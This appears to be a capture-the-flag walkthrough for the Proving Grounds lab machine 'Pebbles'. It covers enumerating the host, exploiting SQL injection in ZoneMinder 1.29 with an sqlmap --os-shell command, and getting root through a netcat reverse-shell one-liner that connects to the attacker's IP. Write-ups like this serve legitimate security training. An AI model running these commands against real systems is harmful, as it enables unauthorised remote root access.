Pebbles

Exploitation Guide for Pebbles | Proving Grounds

Summary:

After bruteforcing the directory we will find a vulnerable application. We will then exploit the vulnerable application with the help of SQLMap to get the shell. No privilege escalation is required since we will get the shell as root.

Enumeration:

Nmap:

┌──(imtodess㉿deathnote)-[~/…/boxes/pg/pebbles/scans]                                                                                                                   
└─$ nmap $ip -p- -T4 -vv   
PORT     STATE SERVICE    REASON
21/tcp   open  ftp        syn-ack
22/tcp   open  ssh        syn-ack
80/tcp   open  http       syn-ack
3305/tcp open  odette-ftp syn-ack
8080/tcp open  http-proxy syn-ack

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)
|   256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)
|_  256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pebbles
3305/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Apache Tomcat
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Tomcat
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Gobuster:

	┌──(imtodess㉿deathnote)-[~/…/boxes/pg/pebbles/scans]
	└─$ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50| tee gobuster.txt
	===============================================================
	Gobuster v3.1.0
	by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
	===============================================================
	[+] Url:                     http://192.168.245.52/
	[+] Method:                  GET
	[+] Threads:                 50
	[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
	[+] Negative Status codes:   404
	[+] User Agent:              gobuster/3.1.0
	[+] Timeout:                 10s
	===============================================================
	2021/08/22 01:19:22 Starting gobuster in directory enumeration mode
	===============================================================
	/images               (Status: 301) [Size: 317] [--> http://192.168.245.52/images/]
	/css                  (Status: 301) [Size: 314] [--> http://192.168.245.52/css/]   
	/javascript           (Status: 301) [Size: 321] [--> http://192.168.245.52/javascript/]
	/zm                   (Status: 301) [Size: 313] [--> http://192.168.245.52/zm/]     

Visit /zm directory. We find that ZoneMinder console is running on the server. Its version is 1.29.0

Searchsploit:

Quick search using searchsploit will give us following result:

┌──(imtodess㉿deathnote)-[~]
└─$ searchsploit zoneminder 1.29              
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery                           | php/webapps/41239.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request ForgeryExploit Database

Exploitation:

SQLmap:

Command:

sqlmap http://$ip/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell 

After some time we will get the shell.

	[10:26:06] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
	os-shell> whoami
	[10:26:24] [INFO] retrieved: 
	root
	command standard output: 'root'
	os-shell> 
	os-shell> which nc
	[10:28:15] [INFO] retrieved: /bin/nc
	command standard output: '/bin/nc

Reverse shell:

Since the target machine has nc installed. We will be using it to send the shell with root privileges.

# change the ip and port according to your need
os-shell> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.79 3305 >/tmp/f 

Start netcat listener on your machine:

	┌──(imtodess㉿deathnote)-[~/…/boxes/pg/pebbles/scans]
	└─$ nc -nvlp 3305       
	listening on [any] 3305 ...
	connect to [192.168.49.79] from (UNKNOWN) [192.168.79.52] 45580     
	/bin/sh: 0: can't access tty; job control turned off
	# whoami
	Root
	# which python3
	/usr/bin/python3
	# python3 -c 'import pty;pty.spawn("/bin/bash")'
	root@pebbles:/var/lib/mysql# cd
	cd
	root@pebbles:~# ls
	ls
	proof.txt
	root@pebbles:~# cat proof.txt
	cat proof.txt
	<Flag_Redacted>
	root@pebbles:~#